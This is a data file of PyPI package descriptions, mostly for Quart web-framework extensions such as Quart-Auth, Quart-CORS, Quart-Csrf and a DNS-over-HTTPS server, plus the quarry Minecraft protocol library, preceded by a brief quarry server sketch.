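As a flavour of the special purpose servers quarry is meant for, below is a small maintenance-mode responder sketched from memory of quarry's example gallery. The class names (ServerFactory, ServerProtocol), the packet_login_start handler and the buff.discard()/self.close() calls are assumptions to check against the quarry docs rather than a definitive implementation.

# Hedged sketch of a tiny quarry server that refuses logins with a message.
# Handler and method names are recalled from quarry's examples and may differ.
from twisted.internet import reactor
from quarry.net.server import ServerFactory, ServerProtocol

class DowntimeProtocol(ServerProtocol):
    def packet_login_start(self, buff):
        buff.discard()                       # drain the unread packet buffer
        self.close("Down for maintenance!")  # disconnect the client with a reason

class DowntimeFactory(ServerFactory):
    protocol = DowntimeProtocol

DowntimeFactory().listen("0.0.0.0", 25565)   # default Minecraft port
reactor.run()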
It allows\nyou to write special purpose clients, servers and proxies.InstallationUsepipto install quarry:$pipinstallquarryFeaturesSupports Minecraft versions 1.7 through 1.19.2Supports Python 3.7+Built upontwistedandcryptographyExposes base classes and hooks for implementing your own client, server or\nproxyImplements many Minecraft data types, such as NBT, Anvil, chunk sections,\ncommand graphs and entity metadataImplements the design of the protocol - packet headers, modes, compression,\nencryption, login/session, etc.Implements all packets in \u201cinit\u201d, \u201cstatus\u201d and \u201clogin\u201d modesDoesnotimplement most packets in \u201cplay\u201d mode - it is left up to you to\nhook and implement the packets you\u2019re interested in"} +{"package": "quarry-io", "pacakge-description": "UNKNOWN"} +{"package": "quart-admin", "pacakge-description": "Quart adminA tool to create quart projects faster with a scalable setupUsageCreating peojectquart-adminstartproject--name\"project name\"Creating app(inside project)quart-adminstartapp--name\"app name\"Run the app locallypythonapp.pystart"} +{"package": "quart-auth", "pacakge-description": "Quart-Auth is an extension forQuartto provide for secure cookie\nauthentication (session management). It allows for a session to be\nlogged in, authenticated and logged out.UsageTo use Quart-Auth with a Quart app you have to create an QuartAuth and\ninitialise it with the application,app=Quart(__name__)QuartAuth(app)or via the factory pattern,auth_manager=QuartAuth()defcreate_app():app=Quart(__name__)auth_manager.init_app(app)returnappIn addition you will need to configure Quart-Auth, which defaults to\nthe most secure. At a minimum you will need to set secret key,app.secret_key=\"secret key\"# Do not use this keywhich you can generate via,>>>importsecrets>>>secrets.token_urlsafe(16)Tou may also need to disable secure cookies to use in development, see\nconfiguration below.With QuartAuth initialised you can use thelogin_requiredfunction to decorate routes that should only be accessed by\nauthenticated users,fromquart_authimportlogin_required@app.route(\"/\")@login_requiredasyncdefrestricted_route():...If no user is logged in, anUnauthorizedexception is raised. To catch it,\ninstall an error handler,@app.errorhandler(Unauthorized)asyncdefredirect_to_login(*_:Exception)->ResponseReturnValue:returnredirect(url_for(\"login\"))You can also use thelogin_user, andlogout_userfunctions to\nstart and end sessions for a specificAuthenticatedUserinstance,fromquart_authimportAuthUser,login_user,logout_user@app.route(\"/login\")asyncdeflogin():# Check Credentials here, e.g. username & password....# We'll assume the user has an identifying ID equal to 2login_user(AuthUser(2))...@app.route(\"/logout\")asyncdeflogout():logout_user()...The user (authenticated or not) is available via the globalcurrent_userincluding within templates,fromquartimportrender_template_stringfromquart_authimportcurrent_user@app.route(\"/\")asyncdefuser():returnawaitrender_template_string(\"{{ current_user.is_authenticated }}\")ContributingQuart-Auth is developed onGitHub. You are very welcome to\nopenissuesor\nproposepull requests.TestingThe best way to test Quart-Auth is with Tox,$pipinstalltox$toxthis will check the code style and run the tests.HelpThe Quart-Authdocumentationis the best places to\nstart, after that try searchingstack overflowor ask for helpon gitter. 
If you still\ncan\u2019t find an answer pleaseopen an issue."} +{"package": "quart_babel", "pacakge-description": "Quart BabelImplements i18n and l10n support for Quart. This is based on the Pythonbabelmodule as well aspytzboth of which are installed automatically\nfor you if you install this library.The original code for this extension was taken from Flask-Babel and Flask-BabelPlus.\nFlask-Babel can be foundhereand Flask-BabelPlus can be foundhereInstallationInstall the extension with the following command:$ pip3 install quart-babelUsageTo use the extension simply import the class wrapper and pass the Quart app\nobject back to here. Do so like this:from quart import Quart\nfrom quart_babel import Babel \n\napp = Quart(__name__)\nbabel = Babel(app)DocumentationThe for Quart-Babel and is availablehere."} +{"package": "quart-bcrypt", "pacakge-description": "Quart-BcryptQuart-Bcrypt is a Quart extension that provides bcrypt hashing utilities for\nyour application. Orginal code from Flash-Bcrypt, which can be found athttps://github.com/maxcountryman/flask-bcryptDue to the recent increased prevelance of powerful hardware, such as modern\nGPUs, hashes have become increasingly easy to crack. A proactive solution to\nthis is to use a hash that was designed to be \"de-optimized\". Bcrypt is such\na hashing facility; unlike hashing algorithms such as MD5 and SHA1, which are\noptimized for speed, bcrypt is intentionally structured to be slow.For sensitive data that must be protected, such as passwords, bcrypt is an\nadvisable choice.InstallationInstall the extension with the following command:$ pip3 install quart-bcryptUsageTo use the extension simply import the class wrapper and pass the Quart app\nobject back to here. Do so like this:from quart import Quart\nfrom quart_bcrypt import Bcrypt\n\napp = Quart(__name__)\nbcrypt = Bcrypt(app)Two primary hashing methods are now exposed by way of the bcrypt object. Note that you\nneed to use decode('utf-8') on generate_password_hash().pw_hash = bcrypt.generate_password_hash('hunter2').decode('utf-8')\nbcrypt.check_password_hash(pw_hash, 'hunter2') # returns TrueDocumentationView documentation athttps://quart-bcrypt.readthedocs.io/en/latest/"} +{"package": "quart-compress", "pacakge-description": "Quart-CompressQuart-Compress allows you to easily compress yourQuartapplication's responses with gzip.The preferred solution is to have a server (likeNginx) automatically compress the static files for you. If you don't have that option Quart-Compress will solve the problem for you.How it worksQuart-Compress both adds the various headers required for a compressed response and gzips the response data. This makes serving gzip compressed static files extremely easy.Internally, every time a request is made the extension will check if it matches one of the compressible MIME types and will automatically attach the appropriate headers.InstallationIf you use pip then installation is simply:$pipinstallquart-compressor, if you want the latest github version:$pipinstallgit+git://github.com/AceFire6/quart-compress.gitUsing Quart-CompressQuart-Compress is incredibly simple to use. 
In order to start gzip'ing your Quart application's assets, the first thing to do is let Quart-Compress know about yourquart.Quartapplication object.fromquartimportQuartfromquart_compressimportCompressapp=Quart(__name__)Compress(app)In many cases, however, one cannot expect a Quart instance to be ready at import time, and a common pattern is to return a Quart instance from within a function only after other configuration details have been taken care of. In these cases, Quart-Compress provides a simple function,quart_compress.Compress.init_app, which takes your application as an argument.fromquartimportQuartfromquart_compressimportCompresscompress=Compress()defstart_app():app=Quart(__name__)compress.init_app(app)returnappIn terms of automatically compressing your assets using gzip, passing yourquart.Quartobject to thequart_compress.Compressobject is all that needs to be done.OptionsWithin your Quart application's settings you can provide the following settings to control the behavior of Quart-Compress. None of the settings are required.OptionDescriptionDefaultCOMPRESS_MIMETYPESSet the list of mimetypes to compress here.['text/html','text/css','text/xml','application/json','application/javascript']COMPRESS_LEVELSpecifies the gzip compression level.6COMPRESS_MIN_SIZESpecifies the minimum file size threshold for compressing files.500COMPRESS_CACHE_KEYSpecifies the cache key method for lookup/storage of response data.NoneCOMPRESS_CACHE_BACKENDSpecified the backend for storing the cached response data.NoneCOMPRESS_REGISTERSpecifies if compression should be automatically registered.True"} +{"package": "quart-compress2", "pacakge-description": "Quart-CompressDescriptionQuart is a Python ASGI web microframework.\nIt is intended to provide the easiest way to use asyncio functionality in a web context, especially with existing Flask apps.\nThis is possible as the Quart API is a superset of the Flask API.--Quart ProjectAs I wanted to seamlessly migrate from Flask to Quart and noticed, that there are a few issues in usingFlask-Compresstogether with Quart, I decided to create my own Quart-Compress packages, which is based on the Flask-Compress project.InstallationInstalling the package is as easy as:$pipinstallquart-compress2UsageTo compress your Quart responses, you only need to compress your Quart object at the beginning using theCompressclass:fromquartimportQuartfromquart_compressimportCompressapp=Quart(__name__)Compress(app)"} +{"package": "quartcord", "pacakge-description": "quartcordTable of ContentsAboutInstallationRequirementsSetupBasic ExampleDocumentationSupportCreditsLicenseAboutDiscord OAuth2 extension for Quart.InstallationRequirementsQuartpyjwtaiohttpoauthlibdiscord.pycachetoolsAsync-OAuthlibSetupTo install current latest release you can use following command:python-mpipinstallquartcordBasic ExamplefromquartimportQuart,redirect,url_forfromquartcordimportDiscordOAuth2Session,requires_authorization,Unauthorizedapp=Quart(__name__)app.secret_key=b\"random bytes representing quart secret key\"app.config[\"DISCORD_CLIENT_ID\"]=490732332240863233# Discord client ID.app.config[\"DISCORD_CLIENT_SECRET\"]=\"\"# Discord client secret.app.config[\"DISCORD_REDIRECT_URI\"]=\"\"# URL to your callback endpoint.app.config[\"DISCORD_BOT_TOKEN\"]=\"\"# Required to access BOT 
resources.discord=DiscordOAuth2Session(app)@app.route(\"/login/\")asyncdeflogin():returnawaitdiscord.create_session()@app.route(\"/callback/\")asyncdefcallback():awaitdiscord.callback()returnredirect(url_for(\".me\"))@app.errorhandler(Unauthorized)asyncdefredirect_unauthorized(e):returnredirect(url_for(\"login\"))@app.route(\"/me/\")@requires_authorizationasyncdefme():user=awaitdiscord.fetch_user()returnf\"\"\"{user.name}\"\"\"if__name__==\"__main__\":app.run()DocumentationHead over todocumentationfor full API reference.SupportProject IssuesFumeStop Community Server(Help > quartcord)CreditsFlask-DiscordQuart-Discord(Do not use; no longer maintained)LicenseMIT LicenseCopyright \u00a9 2023 Sayan \"Sn1F3rt\" Bhattacharyya"} +{"package": "quart-cors", "pacakge-description": "Quart-CORS is an extension forQuartto enable and controlCross\nOrigin Resource Sharing, CORS (also\nknown as access control).CORS is required to share resources in browsers due to theSame\nOrigin Policywhich prevents resources being used from a different origin. An origin\nin this case is defined as the scheme, host and port combined and a\nresource corresponds to a path.In practice the Same Origin Policy means that a browser visitinghttp://quart.comwill prevent the response ofGEThttp://api.combeing read. It will also prevent requests such asPOSThttp://api.com. Note that CORS applies to browser initiated\nrequests, non-browser clients such asrequestsare not subject to\nCORS restrictions.CORS allows a server to indicate to a browser that certain resources\ncan be used, contrary to the Same Origin Policy. It does so via\naccess-control headers that inform the browser how the resource can be\nused. For GET requests these headers are sent in the response. For\nnon-GET requests the browser must ask the server for the\naccess-control headers before sending the actual request, it does so\nvia a preflight OPTIONS request.The Same Origin Policy does not apply to WebSockets, and hence there\nis no need for CORS. Instead the server alone is responsible for\ndeciding if the WebSocket is allowed and it should do so by inspecting\nthe WebSocket-request origin header.Simple (GET) requests should return CORS headers specifying the\norigins that are allowed to use the resource (response). This can be\nany origin,*(wildcard), or a list of specific origins. The\nresponse should also include a CORS header specifying whether\nresponse-credentials e.g. cookies can be used. Note that if credential\nsharing is allowed the allowed origins must be specific and not a\nwildcard.Preflight requests should return CORS headers specifying the origins\nallowed to use the resource, the methods and headers allowed to be\nsent in a request to the resource, whether response credentials can be\nused, and finally which response headers can be used.Note that certain actions are allowed in the Same Origin Policy such\nas embedding e.g.and simple\nPOSTs. 
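A quick way to observe the simple-request behaviour described above is to inspect the response headers with Quart's test client. A minimal sketch, assuming the documented cors(app, allow_origin=...) wrapper and an illustrative /data route:

import asyncio
from quart import Quart
from quart_cors import cors

app = cors(Quart(__name__), allow_origin="https://quart.com")

@app.route("/data")
async def data():
    return "hello"

async def main():
    client = app.test_client()
    # A "simple" GET from an allowed origin should come back with the
    # Access-Control-Allow-Origin header set for that origin.
    response = await client.get("/data", headers={"Origin": "https://quart.com"})
    print(response.headers.get("Access-Control-Allow-Origin"))

asyncio.run(main())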
For the purposes of this readme though these complications are\nignored.The CORS access control response headers are,Header nameMeaningAccess-Control-Allow-OriginOrigins that are allowed to use the resource.Access-Control-Allow-CredentialsCan credentials be shared.Access-Control-Allow-MethodsMethods that may be used in requests to the resource.Access-Control-Allow-HeadersHeaders that may be sent in requests to the resource.Access-Control-Expose-HeadersHeaders that may be read in the response from the resource.Access-Control-Max-AgeMaximum age to cache the CORS headers for the resource.Quart-CORS uses the same naming (without the Access-Control prefix)\nfor it\u2019s arguments and settings when they relate to the same meaning.UsageTo add CORS access control headers to all of the routes in the\napplication, simply apply thecorsfunction to the application, or\nto a specific blueprint,app=Quart(__name__)app=cors(app,**settings)blueprint=Blueprint(__name__)blueprint=cors(blueprint,**settings)alternatively if you wish to add CORS selectively by resource, apply\ntheroute_corsfunction to a route, or thewebsocket_corsfunction to a WebSocket,@app.route('/')@route_cors(**settings)asyncdefhandler():...@app.websocket('/')@websocket_cors(allow_origin=...)asyncdefhandler():...Thesettingsare these arguments,Argumenttypeallow_originUnion[Set[Union[Pattern, str]], Union[Pattern, str]]allow_credentialsboolallow_methodsUnion[Set[str], str]allow_headersUnion[Set[str], str]expose_headersUnion[Set[str], str]max_ageUnion[int, flot, timedelta]which correspond to the CORS headers noted above. Note that all\nsettings are optional and defaults can be specified in the application\nconfiguration,Configuration keytypeQUART_CORS_ALLOW_ORIGINSet[Union[Pattern, str]]QUART_CORS_ALLOW_CREDENTIALSboolQUART_CORS_ALLOW_METHODSSet[str]QUART_CORS_ALLOW_HEADERSSet[str]QUART_CORS_EXPOSE_HEADERSSet[str]QUART_CORS_MAX_AGEfloatThewebsocket_corsdecorator only takes anallow_originargument which defines the origins that are allowed to use the\nWebSocket. A WebSocket request from a disallowed origin will be\nresponded to with a 400 response.Theallow_originorigins should be the origin only (no path, query\nstrings or fragments) i.e.https://quart.comnothttps://quart.com/.Thecors_exemptdecorator can be used in conjunction withcorsto exempt a websocket handler or view function from cors.Simple examplesTo allow an app to be used from any origin (not recommended as it is\ntoo permissive),app=Quart(__name__)app=cors(app,allow_origin=\"*\")To allow a route or WebSocket to be used from another specific domain,https://quart.com,@app.route('/')@route_cors(allow_origin=\"https://quart.com\")asyncdefhandler():...@app.websocket('/')@websocket_cors(allow_origin=\"https://quart.com\")asyncdefhandler():...To allow a route or WebSocket to be used from any subdomain (but not\nthe domain itself) ofquart.com,@app.route('/')@route_cors(allow_origin=re.compile(r\"https:\\/\\/.*\\.quart\\.com\"))asyncdefhandler():...@app.websocket('/')@websocket_cors(allow_origin=re.compile(r\"https:\\/\\/.*\\.quart\\.com\"))asyncdefhandler():...To allow a JSON POST request to an API route, fromhttps://quart.com,@app.route('/',methods=[\"POST\"])@route_cors(allow_headers=[\"content-type\"],allow_methods=[\"POST\"],allow_origin=[\"https://quart.com\"],)asyncdefhandler():data=awaitrequest.get_json()...ContributingQuart-CORS is developed onGitHub. 
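The cors_exempt decorator mentioned above has no example in this README, so here is a short sketch; the import path and the decorator ordering are assumptions to confirm against the Quart-CORS docs.

from quart import Quart
from quart_cors import cors, cors_exempt  # cors_exempt import path assumed

app = cors(Quart(__name__), allow_origin="https://quart.com")

@app.route("/healthz")
@cors_exempt  # ordering relative to @app.route is an assumption
async def healthz():
    # This view opts out of the app-wide CORS handling applied above.
    return "ok"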
You are very welcome to\nopenissuesor\nproposemerge requests.TestingThe best way to test Quart-CORS is with Tox,$pipinstalltox$toxthis will check the code style and run the tests.HelpThis README is the best place to start, after that try opening anissue."} +{"package": "quart-csrf", "pacakge-description": "Quart-CsrfQuart-Csrf is an extension forQuartto provide CSRF protection.\nThe code is taked fromFlask-WTF.UsageTo enable CSRF protection globally for a Quart app, you have to create an CSRFProtect and\ninitialise it with the application,fromquart_csrfimportCSRFProtectapp=Quart(__name__)CSRFProtect(app)or via the factory pattern,csrf=CSRFProtect()defcreate_app():app=Quart(__name__)csrf.init_app(app)returnappNote: CSRF protection requires a secret key to securely sign the token. By default this will\nuse the QUART app's SECRET_KEY. If you'd like to use a separate token you can set QUART_CSRF_SECRET_KEY.HTML Forms: render a hidden input with the token in the form.JavaScript Requests: When sending an AJAX request, add the X-CSRFToken header to it. For example, in jQuery you can configure all requests to send the token.ContributingQuart-Csrf is developed onGitLab. You are very welcome to\nopenissuesor\nproposemerge requests.HelpThis README is the best place to start, after that try opening anissue."} +{"package": "quart-db", "pacakge-description": "Quart-DB is a Quart extension that provides managed connection(s) to\npostgresql or sqlite database(s).QuickstartQuart-DB is used by associating it with an app and a DB (via a URL)\nand then utilising theg.connectionconnection,fromquartimportg,Quart,websocketfromquart_dbimportQuartDBapp=Quart(__name__)db=QuartDB(app,url=\"postgresql://user:pass@localhost:5432/db_name\")@app.get(\"/\")asyncdefget_count(id:int):result=awaitg.connection.fetch_val(\"SELECT COUNT(*) FROM tbl WHERE id = :id\",{\"id\":id},)return{\"count\":result}@app.post(\"/\")asyncdefset_with_transaction():asyncwithg.connection.transaction():awaitdb.execute(\"UPDATE tbl SET done = :done\",{\"done\":True})...return{}@app.get(\"/explicit\")asyncdefexplicit_usage():asyncwithdb.connection()asconnection:...ContributingQuart-DB is developed onGitHub. If you come across an issue,\nor have a feature request please open anissue. If you want to\ncontribute a fix or the feature-implementation please do (typo fixes\nwelcome), by proposing amerge request.TestingThe best way to test Quart-DB is withTox,$pipinstalltox$toxthis will check the code style and run the tests.HelpThe Quart-DBdocumentationis the best places to\nstart, after that try searchingstack overflowor ask for helpon gitter. If you still\ncan\u2019t find an answer pleaseopen an issue."} +{"package": "quart-depends", "pacakge-description": "quart-dependsTable of Contentsquart-dependsInstallationLicenseInstallationpip install quart-dependsLicensequart-dependsis distributed under the terms of theMITlicense."} +{"package": "quart-discord-oauth", "pacakge-description": "No description available on PyPI."} +{"package": "quart-doh", "pacakge-description": "quart-dohquart-doh is a simple DOH (DNS Over HTTPS) server. 
It resolves DNS query on HTTP.ImplementationRFC 8484https://www.rfc-editor.org/rfc/rfc8484.txtJson implementationhttps://developers.cloudflare.com/1.1.1.1/dns-over-https/json-format/Quick startopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodespipenv sync -dpipenv run doh_serverUse with Firefoxin about:config edit::network.trr.mode;3\nnetwork.trr.uri;https://127.0.0.1/dns-queryFor the URI, add your URI for your reverse proxy serving your Quart app.Firefox seems to only accept port 443.InstallationVia Pippip install quart-dohThen :Generate a certificate and a private key :openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodesdoh-server --debug --cert [path]cert.pem --key [path]key.pemdoh-client --noverifyVia Dockeropenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodesdocker build -f Dockerfile -t quart-doh/doh-server .docker run --rm -p 443:443 quart-doh/doh-serverBenchmarkMacbook Pro 2019\nProcessor 2,4 GHz Intel Core i5\nMemory 8 GB 2133 MHz LPDDR3apib -c 100 -d 60 @benchmark_get_url.txtHTTP/1.1\nDuration: 60.024 seconds\nAttempted requests: 15757\nSuccessful requests: 15757\nNon-200 results: 0\nConnections opened: 100\nSocket errors: 0\n\nThroughput: 262.511 requests/second\nAverage latency: 376.399 milliseconds\nMinimum latency: 103.082 milliseconds\nMaximum latency: 2846.580 milliseconds\nLatency std. dev: 456.340 milliseconds\n50% latency: 202.483 milliseconds\n90% latency: 862.423 milliseconds\n98% latency: 2044.469 milliseconds\n99% latency: 2409.697 milliseconds\n\nClient CPU average: 0%\nClient CPU max: 0%\nClient memory usage: 0%\n\nTotal bytes sent: 2.25 megabytes\nTotal bytes received: 5.08 megabytes\nSend bandwidth: 0.30 megabits / second\nReceive bandwidth: 0.68 megabits / second"} +{"package": "quarter", "pacakge-description": "quarterdatetime-like framework for dealing with financial quarters in programs."} +{"package": "quarter-lib", "pacakge-description": "No description available on PyPI."} +{"package": "quartet", "pacakge-description": "No description available on PyPI."} +{"package": "quartet_capture", "pacakge-description": ".d8888b. d8888 8888888b. 88888888888 888 888 8888888b. 8888888888\nd88P Y88b d8P888 888 Y88b 888 888 888 888 Y88b 888\n888 888 d8P 888 888 888 888 888 888 888 888 888\n888 d8P 888 888 d88P 888 888 888 888 d88P 8888888\n888 d88 888 8888888P\" 888 888 888 8888888P\" 888\n888 888 8888888888 888 888 888 888 888 T88b 888\nY88b d88P 888 888 888 Y88b. 
.d88P 888 T88b 888\n \"Y8888P\" 888 888 888 \"Y88888P\" 888 T88b 8888888888A capture and queuing interface for the QU4RTET open source EPCIS platform.\nThis package defines the\ngeneric structure of the QU4RTET rule engine and defines the base classes\nnecessary for use when extending the functionality of QU4RTET.DocumentationThe full documentation here includes an overall explanation and example of\nimplementing rules and steps along with installation instructions:https://serial-lab.gitlab.io/quartet_captureQuickstartInstall quartet_capturepip install quartet_captureAdd it to yourINSTALLED_APPS:INSTALLED_APPS = (\n ...\n 'quartet_capture.apps.QuartetCaptureConfig',\n ...\n)Add quartet_capture\u2019s URL patterns:from quartet_capture import urls as quartet_capture_urls\n\nurlpatterns = [\n ...\n url(r'^', include(quartet_capture_urls)),\n ...\n]FeaturesAccepts inbound HTTP Post messages and queues them up for processing.Stores inbound messages in RabbitMQ backend for processing with the Celery Task Queue.Keeps track of messages and their processing state.Running The Unit Testssource /bin/activate\n(myenv) $ python runtests.py"} +{"package": "quartet_epcis", "pacakge-description": "Built on top of the world-class EPCPyYes python package.\nReal EPCIS support for serious people running real systems.________ ___ ___ _______ ________ ________ ___ ________\n|\\ __ \\|\\ \\ |\\ \\|\\ ___ \\ |\\ __ \\|\\ ____\\|\\ \\|\\ ____\\\n\\ \\ \\|\\ \\ \\ \\\\_\\ \\ \\ __/|\\ \\ \\|\\ \\ \\ \\___|\\ \\ \\ \\ \\___|_\n \\ \\ \\\\\\ \\ \\______ \\ \\ \\_|/_\\ \\ ____\\ \\ \\ \\ \\ \\ \\_____ \\\n \\ \\ \\\\\\ \\|_____|\\ \\ \\ \\_|\\ \\ \\ \\___|\\ \\ \\____\\ \\ \\|____|\\ \\\n \\ \\_____ \\ \\ \\__\\ \\_______\\ \\__\\ \\ \\_______\\ \\__\\____\\_\\ \\\n \\|___| \\__\\ \\|__|\\|_______|\\|__| \\|_______|\\|__|\\_________\\\n \\|__| \\|_________|The essential Open-Source EPCIS component for the QU4RTET traceability\nplatform.For more on QU4RTET seehttp://www.serial-lab.comThe quartet_epcis python package is a Django application that\ncontains the base database models necessary for the support of\nEPCIS 1.2 data persistence to an RDBMS. The quartet_epcis.parsing\npackage contains an EPCIS XML parser that will take an input stream\nof XML data and save it to a configured database back-end.The quartet_epcis.app_models directory contains a set of\nDjango ORM models that are used to define the database scheme\nand store EPCIS data in the database.DocumentationFind the latest docs here:https://serial-lab.gitlab.io/quartet_epcis/The full (pre-built )documentation is under the docs directory in this project.QuickstartInstall QU4RTET EPCISpip install quartet_epcisAdd it to yourINSTALLED_APPS:INSTALLED_APPS = (\n ...\n 'quartet_epcis',\n ...\n)FeaturesMaintains the database schema for EPCIS 1.2 support.Parses EPCIS 1.2 XML streams to the configured backend database system.Enforces business rules around decommissioning, commissioning, aggregation,\ndisaggregation, etc.Running The Unit Testssource /bin/activate\n(myenv) $ pip install -r requirements_test.txt\n(myenv) $ python runtests.py"} +{"package": "quartet_integrations", "pacakge-description": "Third party integrations for the QU4RTET open-source EPCIS platform. 
For\nmore on QU4RTET and SerialLab, seethe SerialLab websitethe SerialLab website:http://serial-lab.comDocumentationThe full documentation is athttps://serial-lab.gitlab.io/quartet_integrations/QuickstartInstall quartet_integrations:pip install quartet_integrationsAdd it to yourINSTALLED_APPS:INSTALLED_APPS=(...'quartet_integrations.apps.QuartetIntegrationsConfig',...)Add quartet_integrations\u2019s URL patterns:fromquartet_integrationsimporturlsasquartet_integrations_urlsurlpatterns=[...url(r'^',include(quartet_integrations_urls)),...]FeaturesTODORunning TestsDoes the code actually work?source /bin/activate\n(myenv) $ pip install tox\n(myenv) $ toxCreditsTools used in rendering this package:Cookiecuttercookiecutter-djangopackage"} +{"package": "quartet_manifest", "pacakge-description": "Reports back QU4RTET configuration and capabilities to quartet-ui.DocumentationDependenciesFirst, make sure you haveDjangoand theDjango Rest Frameworkinstalled and\nyou have an active project started. See the Django and Django Rest Framework\ndocumentation below if you are unfamiliar with this process.Modfiy settings.pyTo use quartet_manifest in a project, first, add it to yourINSTALLED_APPS:INSTALLED_APPS = (\n ...\n 'rest_framework',\n 'quartet_manifest',\n ...\n)Add the URL patternsIn your project\u2019surls.py, add quartet_manifest\u2019s URL patterns:from quartet_manifest import urls as quartet_manifest_urls\n\n\nurlpatterns = [\n ...\n path('manifest/', include('quartet_manifest.urls')),\n ...\n]Test the URLNavigate to the configured host/port and url using the structure below:http://[yourhost name]:[your port]/manifest/quartet-manifest/?format=jsonYou should get a return value as below"} +{"package": "quartet_masterdata", "pacakge-description": "GS1 CBV 1.2 Implementation for Trade Items and Location Master DataModels and APIs to support material, lot and location master data within\nQU4RTET as defined in theGS1 Core Business Vocabulary.Geo-Location/History APIsBy cross-referencing BizLocation and other information from thequartet_epcismodule,quartet_masterdataprovides full geo-location (lat, long) by\nitem by EPCIS event. This provides thequartet-uiinterface a mechanism\nby which to display mapping and geo-location visual assets.DocumentationThe full documentation is athttps://serial-lab.gitlab.io/quartet_masterdata/QuickstartThe QU4RTET Master Data module comes pre-configured in the QU4RTET project;\nhowever, if you need to add it to a test installation manually peform the\nfollowing:Install quartet_masterdata:pip install quartet_masterdataAdd it to yourINSTALLED_APPS:INSTALLED_APPS = (\n ...\n 'quartet_masterdata.apps.QuartetMasterdataConfig',\n ...\n)Add quartet_masterdata\u2019s URL patterns:from quartet_masterdata import urls as quartet_masterdata_urls\n\n\nurlpatterns = [\n ...\n url(r'^', include(quartet_masterdata_urls)),\n ...\n]FeaturesGeoLocation APIsAPI and Database Support For Product Master MaterialAPI and Database Support forRunning Tests** REQUIRES PYTHON 3 **Does the code actually work?source /bin/activate\n(myenv) $ pip install -r requirements_test.txt\n(myenv) $ python runtests.py"} +{"package": "quartet_output", "pacakge-description": "Output Rules and logic for the QU4RTET open-source EPCIS / Level-4\nsupply chain and trading-partner messaging framework.IntroThequartet_outputmodule is responsible for inspecting inbound messages\nand, based on criteria defined by users, singling out some of those messages\nfor further processing. 
Once a message has been filtered, it is typically\nused to create a new message from some existing EPCIS data or to simply\ncreate a new message using the same data with the intent of sending that\nmessage to another system.CriteriaThequartet_outputmodule allows users to defineEPCIS Output Criteriadefinitions. These definitions allow users to instruct the module to look\nat inbound EPCIS events and look for events that meet certain selection\ncriteria. For example, users can define criteria that would inspect all\ninboundTransaction Eventsof actionADDfrom a specificbizLocationwith aPurchase Orderbusiness transaction attached. Once an event\narrives meeting these criteria, the system allows a user to use that event\nto trigger the generation of a shipping event along with all of the serial\nnumbers for the epcs specified in the triggering event. Other scenarios are\npossible as well and, of course, users can implementRulesandStepsof\ntheir own that do just about anything once an inbound event has been filtered.Transportquartet_outputallows users to configure transport configurations using\nbothEndPointandAuthenticationInfodatabase models. These models are\nattached to the criteria that filter EPCIS events and allow the user to\nspecify where messages should be sent once an event has been filtered and\nhas triggered any outbound processing logic.DocumentationThe full documentation is located here:https://serial-lab.gitlab.io/quartet_outputQuickstartInstall quartet_outputpip install quartet_outputAdd it to yourINSTALLED_APPS:INSTALLED_APPS = (\n ...\n 'quartet_output.apps.QuartetOutputConfig',\n ...\n)Add quartet_output\u2019s URL patterns:from quartet_output import urls as quartet_output_urls\n\n\nurlpatterns = [\n ...\n url(r'^', include(quartet_output_urls)),\n ...\n]FeaturesOutput determination allows you to create filters on inbound EPCIS data\nand determine which inbound EPCIS events trigger outbound business messaging.Define HTTP and HTTPS end points for trading partners.Define various authentication schemes for external end points.Outbound messages take advantage of thequartet_capturerule engine by\ncreating a new outbound task for every message. 
This puts every outbound\ntask on the Celery Task Queue- allowing you to scale your outbound messaging\nto your liking.Running The Unit Testssource /bin/activate\n(myenv) $ pip install tox\n(myenv) $ tox"} +{"package": "quartet-rnaseq-report", "pacakge-description": "MultiReport for Quartet RNAseq Report."} +{"package": "quartet_templates", "pacakge-description": "No description available on PyPI."} +{"package": "quartet_tracelink", "pacakge-description": "An EPCIS to TraceLink Codec that overcomes (or tries to) many of the\nquirks, garbage, non-standard BS and other well-known shortcomings of the Tracelink EPCIS interface.DocumentationThe full documentation is athttps://serial-lab.gitlab.io/quartet_tracelink/QuickstartInstall quartet_tracelink:pip install quartet_tracelinkAdd it to yourINSTALLED_APPS:INSTALLED_APPS=(...'quartet_tracelink.apps.QuartetTracelinkConfig',...)Add quartet_tracelink\u2019s URL patterns:fromquartet_tracelinkimporturlsasquartet_tracelink_urlsurlpatterns=[...url(r'^',include(quartet_tracelink_urls)),...]Running TestsDoes the code actually work?source /bin/activate\n(myenv) $ pip install tox\n(myenv) $ toxHistory0.1.0 (2018-09-06)First release on PyPI."} +{"package": "quartet-trail", "pacakge-description": "Logs action in QuartetDocumentationThe full documentation is athttps://serial-lab.gitlab.io/quartet-trail/QuickstartInstall Quartet Trail:pip install quartet-trailAdd it to yourINSTALLED_APPS:INSTALLED_APPS=(...'quartet_trail.apps.QuartetTrailConfig',...)Add Quartet Trail\u2019s URL patterns:fromquartet_trailimporturlsasquartet_trail_urlsurlpatterns=[...url(r'^',include(quartet_trail_urls)),...]FeaturesTODORunning TestsDoes the code actually work?source /bin/activate\n(myenv) $ pip install tox\n(myenv) $ toxHistory0.1.0 (2018-11-07)First release on PyPI."} +{"package": "quartet_vrs", "pacakge-description": "A GS1-compliant VRS interface for QU4RTET, the open-source EPCIS platform.DocumentationThe full documentation is athttps://serial-lab.gitlab.io/quartet_vrs/QuickstartInstall quartet_vrs:pip install quartet_vrsAdd it to yourINSTALLED_APPS:INSTALLED_APPS=(...'quartet_vrs.apps.QuartetVrsConfig',...)Add quartet_vrs\u2019s URL patterns:fromquartet_vrsimporturlsasquartet_vrs_urlsurlpatterns=[...url(r'^',include(quartet_vrs_urls)),...]FeaturesREST APIOpen API SchemaImplements the full Global Lightweight Messaging Standard v1.0.2Providescheckconnectivtyendpoint.Providesverifyendpoint.Running TestsDoes the code actually work?source /bin/activate\n(myenv) $ pip install tox\n(myenv) $ tox"} +{"package": "quart-events", "pacakge-description": "quart-eventsUsagequart_events.EventBroker loads a blueprint into Quart which allows clients to subscribe to events via a WebSockets. The app can then generate events that can be sent to all subscribed clients in real-time.Please seetest/app.pyfor an example app. 
